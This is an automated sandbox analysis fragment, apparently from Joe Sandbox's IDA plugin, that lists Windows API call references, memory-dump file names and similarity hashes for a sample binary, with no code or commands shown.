                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 327935632-0
                                                      • Opcode ID: 6d46d098ec3e34cae72e9c55ca2c61074366514d84ca0df7c40f7d1e91a1c0ce
                                                      • Instruction ID: 612cf748e2e87d28b10fab6dd04aaa0cc6a06b7d1019f3f99f8ed6e57c9d6857
                                                      • Opcode Fuzzy Hash: 6d46d098ec3e34cae72e9c55ca2c61074366514d84ca0df7c40f7d1e91a1c0ce
                                                      • Instruction Fuzzy Hash: 5D513935A0424ADFCB14EFA9C4889ADBBF6FF49315F048065E855AB352DB30AD49CF90
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0064E61F
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0064E648
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0064E687
                                                        • Part of subcall function 005E9837: __itow.LIBCMT ref: 005E9862
                                                        • Part of subcall function 005E9837: __swprintf.LIBCMT ref: 005E98AC
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0064E6AC
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0064E6B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1389676194-0
                                                      • Opcode ID: b0903402beb17bdab8fdcaa9a7407a4e673948082b6c33bfa3b2b1e0a9f2157a
                                                      • Instruction ID: a6890d45576ee1934285ce0be5604beb3774f9550e8f78686163eafaa95f4477
                                                      • Opcode Fuzzy Hash: b0903402beb17bdab8fdcaa9a7407a4e673948082b6c33bfa3b2b1e0a9f2157a
                                                      • Instruction Fuzzy Hash: DB51F735A001459FCB05EF65C985AAEBBF6FF49314F1480A9E849AB362CB31ED11DB50
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 005E2357
                                                      • ScreenToClient.USER32(006A57B0,?), ref: 005E2374
                                                      • GetAsyncKeyState.USER32(00000001), ref: 005E2399
                                                      • GetAsyncKeyState.USER32(00000002), ref: 005E23A7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 6023fa61c5b66338dbdfb403aa4538d893aff0fb9f265a6e47e1afa085cf2672
                                                      • Instruction ID: 403f1993749bc74d65a4f70022b7136aeb012ae256cfa6e743e229991526b0d0
                                                      • Opcode Fuzzy Hash: 6023fa61c5b66338dbdfb403aa4538d893aff0fb9f265a6e47e1afa085cf2672
                                                      • Instruction Fuzzy Hash: D0418E35604105FFCF298F69C844AEDBB7ABB09360F20471AF869D22A4C735AD90DF90
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006363E7
                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00636433
                                                      • TranslateMessage.USER32(?), ref: 0063645C
                                                      • DispatchMessageW.USER32(?), ref: 00636466
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00636475
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                      • String ID:
                                                      • API String ID: 2108273632-0
                                                      • Opcode ID: 6717ddc429c830dcf12d2fe84867a9b5f34520741e584bc12d8cfd461620dfaf
                                                      • Instruction ID: 689f425fd56d50df1a66c7d57347922148f24156309aefacf953ac553ae7fbc3
                                                      • Opcode Fuzzy Hash: 6717ddc429c830dcf12d2fe84867a9b5f34520741e584bc12d8cfd461620dfaf
                                                      • Instruction Fuzzy Hash: CF317031D00656BEDB64DF70DC44BE67BEBAB02300F14D165F422C22A2E765A855DBA1
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00638A30
                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00638ADA
                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00638AE2
                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00638AF0
                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00638AF8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: 388d28b0b84ee7832d39370015dbc273e092af1356a4f6c1b8d31d9798db75c9
                                                      • Instruction ID: 8b7850902dcb075688c60357518388cfdc653f5fc441677f614fa5a383b0bb5b
                                                      • Opcode Fuzzy Hash: 388d28b0b84ee7832d39370015dbc273e092af1356a4f6c1b8d31d9798db75c9
                                                      • Instruction Fuzzy Hash: D5319C71900219EFDF14CFA8D94DADE7BB6EB05315F10822AF925EB2D1CBB09914DB90
                                                      APIs
                                                        • Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0066B192
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0066B1B7
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0066B1CF
                                                      • GetSystemMetrics.USER32(00000004), ref: 0066B1F8
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00650E90,00000000), ref: 0066B216
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MetricsSystem
                                                      • String ID:
                                                      • API String ID: 2294984445-0
                                                      • Opcode ID: 51b6884fe4fd72e417113970602d3cee31968e1a84ecaa8dc0645bc02878fc57
                                                      • Instruction ID: a879b4269211e494c605c8aac27b8315b5251050b5a6bae954fcabf33b81dc36
                                                      • Opcode Fuzzy Hash: 51b6884fe4fd72e417113970602d3cee31968e1a84ecaa8dc0645bc02878fc57
                                                      • Instruction Fuzzy Hash: 82219471510261EFCB109F38DC14AAA7BA6FB06361F156734F932D72E0D73099918B90
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00655A6E
                                                      • GetForegroundWindow.USER32 ref: 00655A85
                                                      • GetDC.USER32(00000000), ref: 00655AC1
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00655ACD
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00655B08
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: ea1fc6328a2c295cdd757e5b4b5dacd5cf25cfed513c26f23a894f98dee72455
                                                      • Instruction ID: 3ea9e17ad658f3fa3753c42d79bb48dba585ba5089575e570ad58c64ca5e8f47
                                                      • Opcode Fuzzy Hash: ea1fc6328a2c295cdd757e5b4b5dacd5cf25cfed513c26f23a894f98dee72455
                                                      • Instruction Fuzzy Hash: 4821A175A00104AFD704EF65DC98A9EBBEAEF48351F148079F84AD7362CA70AC05CB90
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 005E134D
                                                      • SelectObject.GDI32(?,00000000), ref: 005E135C
                                                      • BeginPath.GDI32(?), ref: 005E1373
                                                      • SelectObject.GDI32(?,00000000), ref: 005E139C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 30bda724ace45d5bbcdc0f66db05724af3399062c43fffbfad54903913f37529
                                                      • Instruction ID: c9f251a59515e4ce556570b410d717780b7bf800f0070f91903bbd15314ef731
                                                      • Opcode Fuzzy Hash: 30bda724ace45d5bbcdc0f66db05724af3399062c43fffbfad54903913f37529
                                                      • Instruction Fuzzy Hash: 6D21AF30900B58EFDB10EF26EC047AD7FAAFB05721F185626F852965B0D7B4A891CF94
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00644ABA
                                                      • __beginthreadex.LIBCMT ref: 00644AD8
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00644AED
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00644B03
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00644B0A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                      • String ID:
                                                      • API String ID: 3824534824-0
                                                      • Opcode ID: a28cd3fbbac17eab6709f7d22bf958c06543a3bac9917a1d92c127e42cc4e726
                                                      • Instruction ID: 6a18c337b18c4d877fe450b8af5880cf5ea81f51c0f530d6eb870987d85dddcc
                                                      • Opcode Fuzzy Hash: a28cd3fbbac17eab6709f7d22bf958c06543a3bac9917a1d92c127e42cc4e726
                                                      • Instruction Fuzzy Hash: 86112B76909614BBC700EFA8EC09BDB7FAEEB46320F154269F815D3351DAB1DD048BA0
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0063821E
                                                      • GetLastError.KERNEL32(?,00637CE2,?,?,?), ref: 00638228
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00637CE2,?,?,?), ref: 00638237
                                                      • HeapAlloc.KERNEL32(00000000,?,00637CE2,?,?,?), ref: 0063823E
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00638255
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: ed090fbb520d5003d9e0bd8ed397ce9d876eb3393ec2b6225c0aab42728c14b4
                                                      • Instruction ID: 3b4ac89033ed85f5dc6b45a84d909fb2dae01b2229bf856deee6c09babe9e433
                                                      • Opcode Fuzzy Hash: ed090fbb520d5003d9e0bd8ed397ce9d876eb3393ec2b6225c0aab42728c14b4
                                                      • Instruction Fuzzy Hash: 67016D71200304BFDB204FA5EC48DAB7BAEFF8A754B500429F809C3220DAB29D10CAA0
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?,?,00637455), ref: 00637127
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?), ref: 00637142
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?), ref: 00637150
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?), ref: 00637160
                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00637044,80070057,?,?), ref: 0063716C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: 823dc02fb38cbfad0b07639c4f9bc44aa6a1cac70d0beb1a427d86983470b4dd
                                                      • Instruction ID: efed1636de3ea4b27975d501c0372dc5c98bd5d5f0d1b0d02b132f4bc4058829
                                                      • Opcode Fuzzy Hash: 823dc02fb38cbfad0b07639c4f9bc44aa6a1cac70d0beb1a427d86983470b4dd
                                                      • Instruction Fuzzy Hash: 07017CB3605204ABDB214F64EC44AAA7BBEEB447A1F1810A8FD44D3220D7B1DD41DBE0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00645260
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0064526E
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00645276
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00645280
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006452BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: 86407ccff7afbde958b3c80b0231c4198ea1f8dfc785fcef1f85c2406ebdc5a8
                                                      • Instruction ID: 388c6f1e95262c7289ef18a13ce7e530a29a0e229bf86a8a698382ab996cf13b
                                                      • Opcode Fuzzy Hash: 86407ccff7afbde958b3c80b0231c4198ea1f8dfc785fcef1f85c2406ebdc5a8
                                                      • Instruction Fuzzy Hash: B0012931D01A1DDBCF00EFE4E8499EEFB7AFB09711F401596E942B2241CBB096508BA5
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00638121
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0063812B
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0063813A
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00638141
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00638157
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: 43492354fc98dd7345eaf79d2098bbdf43c9f85e5f3f698831cfc528578f0255
                                                      • Instruction ID: 8c2f0e19c20d1cb5226f82a3ce5cdfc5501616a0115d8cddfa4497dd2e81750b
                                                      • Opcode Fuzzy Hash: 43492354fc98dd7345eaf79d2098bbdf43c9f85e5f3f698831cfc528578f0255
                                                      • Instruction Fuzzy Hash: 32F06271200305AFEB110FA5EC88EE73BAEFF4A754F001025F985C7250CBA19D41DAA0
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0063C1F7
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0063C20E
                                                      • MessageBeep.USER32(00000000), ref: 0063C226
                                                      • KillTimer.USER32(?,0000040A), ref: 0063C242
                                                      • EndDialog.USER32(?,00000001), ref: 0063C25C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 5a1fd1f0801bdd744b74a5966906d8c05a64ac6abad6a0c2b802e1ef23f1a873
                                                      • Instruction ID: 2ec2b0a84707b4e3e14f2333ce5263dfcb1f3dfef709adb4456e4e3ca1ec16d0
                                                      • Opcode Fuzzy Hash: 5a1fd1f0801bdd744b74a5966906d8c05a64ac6abad6a0c2b802e1ef23f1a873
                                                      • Instruction Fuzzy Hash: 3A01A230404704ABEB209B64ED4EB977BBABB04B06F000269F582E14E0DBE46A548BD0
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 005E13BF
                                                      • StrokeAndFillPath.GDI32(?,?,0061B888,00000000,?), ref: 005E13DB
                                                      • SelectObject.GDI32(?,00000000), ref: 005E13EE
                                                      • DeleteObject.GDI32 ref: 005E1401
                                                      • StrokePath.GDI32(?), ref: 005E141C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: 0e8e44ca34e2dca3a08eaf65fa7ba6eefde19657b181918b85e2451472287fdf
                                                      • Instruction ID: f50f64489fb34de677795749c64ad08d91c9fc85ef8b643d016f221c8de27f22
                                                      • Opcode Fuzzy Hash: 0e8e44ca34e2dca3a08eaf65fa7ba6eefde19657b181918b85e2451472287fdf
                                                      • Instruction Fuzzy Hash: 5FF04F30014B48EBDB15AF26EC4C7583FA6B702326F08A224F46A485F2C7785995DF14
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0064C432
                                                      • CoCreateInstance.OLE32(00672D6C,00000000,00000001,00672BDC,?), ref: 0064C44A
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                      • CoUninitialize.OLE32 ref: 0064C6B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                      • String ID: .lnk
                                                      • API String ID: 2683427295-24824748
                                                      • Opcode ID: de6aa5c993a74c9511b2a7e9963e90b9e1d010acd016c8a34406e98f28f14e8d
                                                      • Instruction ID: da9eac5f9aac24cbe9a3ab92035f9e205ef62093b6c3117db3dcac4624cf2e9b
                                                      • Opcode Fuzzy Hash: de6aa5c993a74c9511b2a7e9963e90b9e1d010acd016c8a34406e98f28f14e8d
